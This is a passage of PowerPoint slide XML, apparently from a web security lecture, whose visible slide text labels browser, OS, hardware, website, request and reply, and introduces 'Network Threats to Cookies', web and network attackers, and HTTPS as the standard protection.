            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52238" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090D41CF-2CA6-204B-BBFA-4C21E3570C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3475822" y="2642212"/>
            <a:ext cx="4191000"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2239" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF09AB12-C00B-B140-8265-972B17B1BB36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3475822" y="3021626"/>
            <a:ext cx="4191000" cy="15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7" name="Oval 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDBD25AA-3137-814D-8D89-F732933851A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999822" y="4810738"/>
            <a:ext cx="1371600" cy="479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a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A86530DF-4411-344B-B9E5-C4F5DBD33F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525967" y="4976781"/>
            <a:ext cx="3598533" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cannot be read by script via DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1525435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8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD746C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1621970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 253"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>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91" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7829096" y="3214004"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D41CC6B3-1485-474A-886E-DB43188A0175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1621970" y="3880753"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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mn-lt"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381A867E-90CA-9147-89E8-0C3760723563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1621970" y="4337953"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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mn-lt"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7613196" y="2798079"/>
            <a:ext cx="1095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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>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96" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4161970" y="2701242"/>
            <a:ext cx="1022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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA7330881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4435361" y="3544203"/>
            <a:ext cx="735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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281728A-C6D7-7246-88EE-C2118FCC53CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Threats to Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898AE998-0FD6-894E-9E74-A4EAE9F9AE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8787493" y="4109353"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD3EBFC-F45B-8B4D-B703-20E21ACAA7AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8982982" y="1761268"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92FB850-1D99-C14A-85DA-4E7B1442CE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9902146" y="2727776"/>
            <a:ext cx="365125" cy="3651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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3705EA20-EC91-F343-8D46-DAEA3427D6F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6874328" y="4266119"/>
            <a:ext cx="11756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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Explosion 1 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEB4F082-48B1-BA44-A8E0-40377CC6BE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7298989" y="2355477"/>
            <a:ext cx="1976437" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Explosion 1 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9E49AC-68E6-4246-B301-713C44678D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4488715" y="2499628"/>
            <a:ext cx="2362200" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49D1640-F4AB-5647-84A6-D8A53BF7C3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621970" y="5646268"/>
            <a:ext cx="5479385" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Standard protection from network attacks: HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4137C2-254C-4948-B653-D5B6ABD20F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509306" y="6030088"/>
            <a:ext cx="2786340" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>much more about HTTPS later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99B0139-507E-0946-9F76-59DF94D5B9A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7072266" y="5978743"/>
            <a:ext cx="437040" cy="189000"/>
            <a:chOff x="7072266" y="5978743"/>
            <a:chExt cx="437040" cy="18900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799BEF05-9553-444D-B85E-59076CFB818F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7072266" y="5988103"/>
                <a:ext cx="437040" cy="179640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799BEF05-9553-444D-B85E-59076CFB818F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7063266" y="5979103"/>
                  <a:ext cx="454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C69733BC-7398-FD4E-A772-40A8032A5781}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7085226" y="6017983"/>
                <a:ext cx="20880" cy="115560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="11" name="Ink 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69733BC-7398-FD4E-A772-40A8032A5781}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7076226" y="6008983"/>
                  <a:ext cx="38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45B3F218-B3B7-714C-8A87-6D1B580BF15B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7075866" y="5978743"/>
                <a:ext cx="128880" cy="21240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
